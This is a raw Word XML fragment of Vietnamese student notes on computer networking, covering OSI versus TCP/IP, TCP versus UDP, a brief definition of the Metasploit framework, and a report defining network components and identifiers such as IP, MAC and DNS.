      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A5703B" w14:textId="59A496EC" w:rsidR="00A27DF0" w:rsidRDefault="00A27DF0" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27DF0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF4DBF0" wp14:editId="3ADD5F7A">
            <wp:extent cx="5543550" cy="6890385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="8" name="Picture 8" descr="C:\Users\sv_trangtt\Downloads\last\Clipboard - October 18, 2022 1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_trangtt\Downloads\last\Clipboard - October 18, 2022 11-0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6890385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62CC4F" w14:textId="792A82DF" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( slide)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0ECA27" w14:textId="0DFF4A24" w:rsidR="001311A7" w:rsidRPr="008D4626" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="001311A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sự khác biệt giữa 2 mô hình OSI và TCP/IP</w:t>
      </w:r>
      <w:r w:rsidR="008D4626" w:rsidRPr="008D4626">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CC02A6" wp14:editId="3245DA7B">
            <wp:extent cx="5943600" cy="320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8655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E010D" w14:textId="1C0643F3" w:rsidR="001311A7" w:rsidRPr="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một số điểm khác biệt giữa TCP và UDP</w:t>
      </w:r>
      <w:r w:rsidR="008D4626" w:rsidRPr="008D4626">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37699533" wp14:editId="12128E0B">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0375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B231E" w14:textId="3CDB6C5D" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trình bày về hiểu biết về metasploit, meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214778C" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r w:rsidRPr="008D4626">
        <w:t>Metasploit là một framework kiểm thử xâm nhập tìm, kiểm tra, tấn công và khai thác các lỗ hổng trong hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AF027" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r w:rsidRPr="008D4626">
        <w:t>Metasploit đuợc xây dựng từ ngôn ngữ hướng đối tuợng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D8F0CB" w14:textId="7E1BEE25" w:rsidR="008D4626" w:rsidRPr="001311A7" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:t>Điều này bao gồm trinh sát, quét, khai thác, leo thang đặc quyền và duy trì quyền truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F0EE2" w14:textId="392F6AA0" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lập bảng so sánh các loại malware: đặc trưng, phương thức lây nhiễm phổ biến, impact của nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA81CF6" w14:textId="296445C2" w:rsidR="007B1F51" w:rsidRDefault="00D86A02" w:rsidP="007B1F51">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B729E3F" wp14:editId="6E0BE64E">
            <wp:extent cx="5943600" cy="3745230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="Picture 6">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1566304-EF2A-4355-A21A-A5DE0EB78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566304-EF2A-4355-A21A-A5DE0EB78F98}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3745230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35FF36E3" wp14:editId="705B97F0">
            <wp:extent cx="5943600" cy="3568700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 5">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF72CECE-ED37-82B6-EFFC-AD49CE23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72CECE-ED37-82B6-EFFC-AD49CE23113E}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3568700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13160A72" wp14:editId="7D5B1B43">
            <wp:extent cx="5943600" cy="3964940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 8">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F457934-F4C2-7171-153E-D1DAC36AC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457934-F4C2-7171-153E-D1DAC36ACC1C}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3964940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4FD05" w14:textId="66ECB1FD" w:rsidR="007B1F51" w:rsidRDefault="007B1F51" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B2209" w14:textId="02352762" w:rsidR="007B1F51" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>What is a Computer Network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C348443" w14:textId="72F08CEF" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng máy tính là một nhóm gồm hai hoặc nhiều hệ thống được kết nối với nhau. Có thể thiết lập kết nối mạng bằng cáp hoặc phương tiện không dây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B9E1E" w14:textId="78175F45" w:rsidR="0011015E" w:rsidRPr="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các thành phần mạng máy tính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219322C0" w14:textId="77777777" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switches </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAB4FC" w14:textId="6E378EB3" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:r>
        <w:t>Switches hoạt động như một bộ điều khiển kết nối máy tính, máy in và các thiết bị phần cứng khác với mạng trong khuôn viên hoặc tòa nhà.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC52ADB" w14:textId="77777777" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switches </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A66AE" w14:textId="3609F51E" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:r>
        <w:t>Switches hoạt động như một bộ điều khiển kết nối máy tính, máy in và các thiết bị phần cứng khác với mạng trong khuôn viên hoặc tòa nhà.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812D11F" w14:textId="77777777" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D4668" w14:textId="3F423AB2" w:rsidR="0011015E" w:rsidRDefault="0011015E" w:rsidP="0011015E">
      <w:r>
        <w:t>Servers là máy tính chứa các chương trình, tệp được chia sẻ và hệ điều hành mạng. Routers cho phép tất cả người dùng trong mạng truy cập vào tài nguyên mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F67A7" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2A5D7" w14:textId="07F4A0E4" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="0011015E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Clients là thiết bị máy tính truy cập và sử dụng mạng cũng như chia sẻ tài nguyên mạng. Là người dùng của mạng, vì client có thể gửi và nhận các yêu cầu từ server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFB8D4" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Transmission Media(phương tiện truyền dẫn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECCF802" w14:textId="629D6649" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="0011015E">
      <w:r>
        <w:t>Transmission Media được sử dụng để kết nối các máy tính trong mạng, chẳng hạn như cáp đồng trục, dây xoắn đôi và cáp quang. Nó còn được gọi là liên kết, kênh hoặc đường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531317C" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access points (các điểm truy cập) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69EEC3" w14:textId="5B444F84" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="0011015E">
      <w:r>
        <w:t>Các điểm truy cập cho phép các thiết bị kết nối với mạng không dây mà không cần dây cáp. Mạng không dây cho phép mang các thiết bị mới và hỗ trợ linh hoạt cho người dùng di động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712AA04A" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shared data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB6EB7" w14:textId="0B541ABA" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="0011015E">
      <w:r>
        <w:t>Report 2 Dữ liệu được chia sẻ là dữ liệu được chia sẻ giữa các máy client như tệp dữ liệu, chương trình truy cập máy in và email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E65EBF" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network Interface Card (NID) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349219BA" w14:textId="5DCDB674" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="0011015E">
      <w:r>
        <w:t>Network Interface Card gửi, nhận dữ liệu và điều khiển luồng dữ liệu giữa máy tính và network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656280BD" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Local Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC31F00" w14:textId="2DAF9296" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Hệ điều hành local giúp máy tính cá nhân truy cập tệp, in ra máy in cục bộ và sử dụng một hoặc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nhiều ổ đĩa và ổ CD nằm trên máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718923A8" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Network Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D508D" w14:textId="16A9087D" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Hệ điều hành network là một chương trình chạy trên máy tính và máy servers. Nó cho phép các máy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tính giao tiếp qua network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47F9E8" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883537A" w14:textId="1F55C836" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Protocol là một tập hợp các quy tắc được xác định cho phép hai entities giao tiếp trên mạng. Một số</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>giao thức tiêu chuẩn được sử dụng cho mục đích này là IP, TCP, UDP, FTP, v.v.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126347A" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D5654" w14:textId="51A87911" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hub là thiết bị chia kết nối mạng thành nhiều máy tính. Nó hoạt động như một trung tâm phân phối</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nên bất cứ khi nào một máy tính yêu cầu bất kỳ thông tin nào từ máy tính hoặc từ mạng, nó sẽ gửi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>yêu cầu đến trung tâm thông qua một dây cáp. Trung tâm sẽ nhận yêu cầu và truyền nó đến toàn bộ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025A9DC" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>LAN Cable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987CFE1" w14:textId="7EEF73EA" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Local Area Network(LAN)Cáp Mạng cục bộ còn được gọi là Ethernet hoặc cáp dữ liệu. Nó được sử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dụng để kết nối thiết bị với internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3EEF36" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>OSI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD5DA7" w14:textId="5A717A8B" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>OSI là viết tắt của Open Systems Interconnection. Đây là một mô hình tham chiếu cho phép bạn xác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>định các tiêu chuẩn cho truyền thông.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E771D1B" w14:textId="42693CE0" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Unique Identifiers of Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE976B1" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137B366D" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Mỗi thiết bị của mạng được liên kết với một thiết bị duy nhất, được gọi là Hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E3AA11" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>IP Address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14194D92" w14:textId="2CB5EB79" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>IP (Giao thức Internet) Address là một số nhận dạng identifier duy nhất cho mỗi thiết bị trên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Internet. Độ dài của địa chỉ IP là 32-bit. Địa chỉ IPv6 là 128 bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6D4C1" w14:textId="1B6B08DC" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C7E05" w14:textId="046ED427" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>DNS là viết tắt của Domain Name System. Nó là một máy chủ dịch URL hoặc địa chỉ web thành địa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chỉ IP tương ứng của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB49B3" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A18E79" w14:textId="556BCAE9" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>MAC (Media Access Control Address) được biết đến như một địa chỉ vật lý là mã định danh duy nhất</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>của mỗi máy chủ lưu trữ và được liên kết với NIC. Độ dài chung của địa chỉ MAC là: 12 chữ số / 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>byte / 48 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE37FBD" w14:textId="77777777" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A514539" w14:textId="1E629E10" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:r>
        <w:t>Port là một kênh logic cho phép người dùng mạng gửi hoặc nhận dữ liệu đến một ứng dụng. Mỗi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>máy chủ lưu trữ có thể có nhiều ứng dụng đang chạy. Mỗi ứng dụng này được xác định bằng số</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cổng mà chúng đang chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485697DD" w14:textId="472D499D" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Các loại mạng máy tính khác nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C669FDF" w14:textId="4D34A366" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Các loại kết nối trong mạng máy tính có thể được phân loại theo kích thước cũng như mục đíchcủa chúng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DF935" w14:textId="2E00ABE2" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
